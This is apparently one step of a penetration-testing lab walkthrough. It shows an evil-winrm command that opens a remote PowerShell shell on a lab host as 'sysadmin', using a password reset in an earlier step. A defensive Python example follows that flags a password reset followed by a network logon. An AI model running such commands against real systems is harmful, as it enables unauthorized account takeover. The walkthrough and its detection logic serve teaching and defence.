11. Validate New Credentials via WinRM

Last updated 24 days ago

Now that you've reset the password for sysadmin, you can try to get a remote shell using WinRM.

Test the new credentials over WinRM (Windows Remote Management, the service PowerShell Remoting runs over). A successful login gives you an interactive command line on the target.

Command:

evil-winrm -i 192.168.10.4 -u 'sysadmin' -p 'NewPassword123'

✅ If successful:

You’ll get a PowerShell prompt like:

PS C:\Users\sysadmin>

Then type:

whoami

Expected output:

megachange\sysadmin

That confirms the reset credentials work and that you have an interactive shell on the machine as the domain account megachange\sysadmin.
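From the defender's side, the step above leaves a recognisable trace: a password reset on an account (Windows Security event 4724, performed here by a different user) followed within minutes by a network logon of that same account (event 4624, logon type 3, which is how a WinRM session appears). The correlation below is an added example written for this page, not part of the lab; the event records, account names and addresses are constructed, and the field names are simplified versions of the Security-log fields.

```python
from datetime import datetime, timedelta

# Constructed sample Security-log events (not captured from the lab host).
# 4724 = "An attempt was made to reset an account's password"
# 4624 = "An account was successfully logged on"; logon_type 3 = network,
#        which is how a WinRM session over 5985/5986 is recorded
SAMPLE_EVENTS = [
    {"ts": "2024-05-01T10:00:00", "id": 4724, "subject": "lowpriv",
     "target": "sysadmin", "ip": "192.168.10.50"},
    {"ts": "2024-05-01T10:01:30", "id": 4624, "logon_type": 3,
     "target": "sysadmin", "ip": "192.168.10.50"},
    {"ts": "2024-05-01T12:00:00", "id": 4724, "subject": "helpdesk",
     "target": "jdoe", "ip": "192.168.10.7"},
    {"ts": "2024-05-01T15:00:00", "id": 4624, "logon_type": 3,
     "target": "jdoe", "ip": "192.168.10.22"},
]

def reset_then_remote_logon(events, window=timedelta(minutes=30)):
    """Pair each 4724 reset with the first network logon (4624, type 3) of
    the same account inside `window`; return one alert dict per pair."""
    ordered = sorted(events, key=lambda e: e["ts"])
    alerts = []
    for i, reset in enumerate(ordered):
        if reset["id"] != 4724:
            continue
        t0 = datetime.fromisoformat(reset["ts"])
        for later in ordered[i + 1:]:
            t1 = datetime.fromisoformat(later["ts"])
            if t1 - t0 > window:
                break  # events are sorted, nothing later can match
            if (later["id"] == 4624 and later.get("logon_type") == 3
                    and later["target"] == reset["target"]):
                alerts.append({
                    "account": reset["target"],
                    "reset_by": reset["subject"],   # who changed the password
                    "reset_from": reset["ip"],
                    "logon_from": later["ip"],
                    "seconds_after_reset": int((t1 - t0).total_seconds()),
                })
                break
    return alerts

if __name__ == "__main__":
    for alert in reset_then_remote_logon(SAMPLE_EVENTS):
        print(alert)
```

With the default 30-minute window only the sysadmin reset-then-logon pair is flagged; the helpdesk reset of jdoe followed by a logon three hours later is not, which is the kind of legitimate activity a tighter window is meant to leave alone.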